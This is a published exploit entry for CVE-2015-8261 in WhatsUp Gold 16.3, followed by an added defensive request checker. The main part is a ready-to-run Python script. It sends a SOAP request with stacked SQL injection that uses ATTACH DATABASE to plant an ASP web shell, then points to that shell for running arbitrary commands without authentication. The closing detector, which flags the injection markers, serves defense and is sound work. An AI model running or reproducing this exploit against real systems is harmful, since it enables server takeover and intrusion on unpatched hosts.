"WhatsUp Gold 16.3 - Remote Code Execution"

Author: Matt Buzanowski
Platform: asp
Release date: 2016-01-13

#
# Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution
# Date: 2016-01-13
# Exploit Author: Matt Buzanowski
# Vendor Homepage: http://www.ipswitch.com/
# Version: 16.3.x
# Tested on: Windows 7 x86
# CVE : CVE-2015-8261
# Usage: python DroneDeleteOldMeasurements.py <target ip>

import requests
import sys

ip_addr = sys.argv[1]

shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''

sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell

session = requests.Session()

headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}

body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">
      <serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>
        <DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <authorizationString>0123456789</authorizationString>
        <maxAgeInMinutes>1</maxAgeInMinutes>
        <iDroneName>%s</iDroneName>
        </DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>
    </DroneDeleteOldMeasurements>
  </soap:Body>
</soap:Envelope>""" % sqli_str

response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers)
print "Status code:", response.status_code
print "Response body:", response.content

print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr
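
A defensive check for the request this proof of concept sends, added here as an example (it is not part of the original exploit or of WhatsUp Gold): it inspects the iDroneName field of a request to /iDrone/iDroneComAPI.asmx for the statement-stacking and ATTACH DATABASE markers the injection relies on. The allowlist for legitimate drone names, the function name `inspect_request` and the sample bodies are assumptions constructed for illustration.

```python
import html
import re

# Endpoint and field name come from the request shown above.
ENDPOINT = "/iDrone/iDroneComAPI.asmx"
NAME_RE = re.compile(r"<iDroneName>(.*?)</iDroneName>", re.S | re.I)
# Assumption: legitimate drone names are short plain identifiers.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.\- ]{1,64}")
# Markers of statement stacking or file creation inside the name field.
MARKERS = {
    "quote": re.compile(r"'"),
    "statement_separator": re.compile(r";"),
    "sql_comment": re.compile(r"--"),
    "attach_database": re.compile(r"\battach\s+database\b", re.I),
    "script_extension": re.compile(r"\.(asp|aspx|asmx|ashx)\b", re.I),
}

def inspect_request(path, body):
    """Return sorted findings for one HTTP request; an empty list means clean."""
    if path.lower() != ENDPOINT.lower():
        return []
    # Two XML layers (SOAP envelope, serialized inner request): unescape twice.
    text = html.unescape(html.unescape(body))
    findings = set()
    for name in NAME_RE.findall(text):
        if SAFE_NAME.fullmatch(name.strip()):
            continue
        findings.add("name_not_allowlisted")
        findings.update(k for k, rx in MARKERS.items() if rx.search(name))
    return sorted(findings)

# Constructed sample bodies (not captured traffic); the path is a placeholder.
BENIGN = (
    "<serializedDeleteOldMeasurementsRequest>"
    "&lt;iDroneName&gt;drone-01&lt;/iDroneName&gt;"
    "</serializedDeleteOldMeasurementsRequest>"
)
SUSPICIOUS = BENIGN.replace(
    "drone-01",
    "x&amp;apos;; ATTACH DATABASE &amp;apos;PLACEHOLDER.asp&amp;apos; AS d;--",
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_request(ENDPOINT, sample))
```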